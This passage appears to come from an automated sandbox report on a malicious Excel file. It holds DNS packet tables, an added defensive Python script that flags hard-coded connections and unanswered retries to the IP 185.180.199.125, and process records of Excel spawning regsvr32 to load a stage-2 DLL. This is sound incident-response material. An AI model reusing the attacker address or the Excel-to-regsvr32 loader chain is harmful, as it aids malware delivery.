Jun 11, 2021 12:16:45.026585102 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:45.903760910 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:45.963625908 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:46.460103035 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:46.518554926 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:48.928911924 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:48.988672972 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:58.783878088 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:58.853579044 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:59.096837044 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:59.155209064 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:17:01.396725893 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:17:01.456741095 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:17:34.933397055 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:17:35.001199961 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:17:36.844029903 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:17:36.902456045 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4 |
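Added example, not part of the sandbox report: Python that reproduces two checks a responder would run over the packet tables above. First, the "TCP traffic without corresponding DNS query" signature from this report: any TCP destination that never appeared in a DNS answer is a hard-coded address (the macro above carries the literal 185.180.199.125). Second, a look at the TCP rows themselves: three packets from the same source port 49735 to 185.180.199.125:80, roughly 0, 3 and 9 seconds apart, with no packet in the reverse direction, which is consistent with unanswered SYNs being retransmitted rather than a completed download. The TCP rows are copied from the table above; the DNS answers are constructed, because the report lists the DNS packets to 8.8.8.8 but not their contents, and use documentation addresses so they cannot be mistaken for real infrastructure.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Rows copied from the TCP Packets table of this report.
TCP_ROWS = [
    "Jun 11, 2021 12:16:10.141882896 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |",
    "Jun 11, 2021 12:16:13.319777012 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |",
    "Jun 11, 2021 12:16:19.382778883 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |",
]

# Constructed DNS answers (assumption): the report does not show the DNS payloads, so these
# names and RFC 5737 documentation addresses are illustrative only.
DNS_ANSWERS: Dict[str, Set[str]] = {
    "update.example.net": {"203.0.113.10", "203.0.113.11"},
    "telemetry.example.org": {"198.51.100.7"},
}


@dataclass(frozen=True)
class Packet:
    ts: datetime
    sport: int
    dport: int
    src: str
    dst: str


def parse_row(row: str) -> Packet:
    """Parse one table row. The timestamps carry nanoseconds; strptime's %f takes at most microseconds."""
    cols = [c.strip() for c in row.strip().strip("|").split("|")]
    ts_text = cols[0].rsplit(" ", 1)[0]            # drop the zone label (every row is CEST)
    ts = datetime.strptime(ts_text[:-3], "%b %d, %Y %H:%M:%S.%f")
    return Packet(ts, int(cols[1]), int(cols[2]), cols[3], cols[4])


def resolved_ips(answers: Dict[str, Set[str]]) -> Set[str]:
    """Every address any DNS answer returned during the run."""
    return set().union(*answers.values()) if answers else set()


def tcp_without_dns(packets: List[Packet], resolved: Set[str], local_prefix: str = "192.168.") -> Set[str]:
    """Destinations the client connected to without a DNS answer naming them: hard-coded addresses."""
    return {p.dst for p in packets if p.src.startswith(local_prefix) and p.dst not in resolved}


Flow = Tuple[str, int, str, int]


def unanswered_connects(packets: List[Packet]) -> Dict[Flow, List[float]]:
    """Per client 4-tuple, the offsets in seconds of repeated packets when nothing ever came back.
    A same-port burst at about 0, 3 and 9 s with no reverse-direction packet is the shape of
    Windows SYN retransmissions against a host that does not answer."""
    flows: Dict[Flow, List[Packet]] = defaultdict(list)
    for p in sorted(packets, key=lambda p: p.ts):
        flows[(p.src, p.sport, p.dst, p.dport)].append(p)
    result: Dict[Flow, List[float]] = {}
    for (src, sport, dst, dport), pkts in flows.items():
        if (dst, dport, src, sport) in flows or len(pkts) < 2:
            continue                                # answered, or a single attempt
        t0 = pkts[0].ts
        result[(src, sport, dst, dport)] = [round((p.ts - t0).total_seconds(), 2) for p in pkts]
    return result


def analyze(rows: List[str] = TCP_ROWS, answers: Dict[str, Set[str]] = DNS_ANSWERS):
    """Run both checks over a packet table; returns (hard-coded destinations, retry timelines)."""
    packets = [parse_row(r) for r in rows]
    return tcp_without_dns(packets, resolved_ips(answers)), unanswered_connects(packets)


if __name__ == "__main__":
    hardcoded, retries = analyze()
    print("TCP destinations never seen in a DNS answer:", sorted(hardcoded))
    for flow, offsets in retries.items():
        print("unanswered flow", flow, "retried at", offsets)
```

The report's UDP table shows only the DNS transport, so in practice the answer set comes from the pcap rather than from these rows; the point of the second check is that the absence of reverse-direction packets means the stage-2 payload s1.dll was not observed being fetched in this run, which should be stated when the report is used to scope an incident.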
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 12:16:05 |
Start date: | 11/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe80000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 12:16:31 |
Start date: | 11/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf30000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|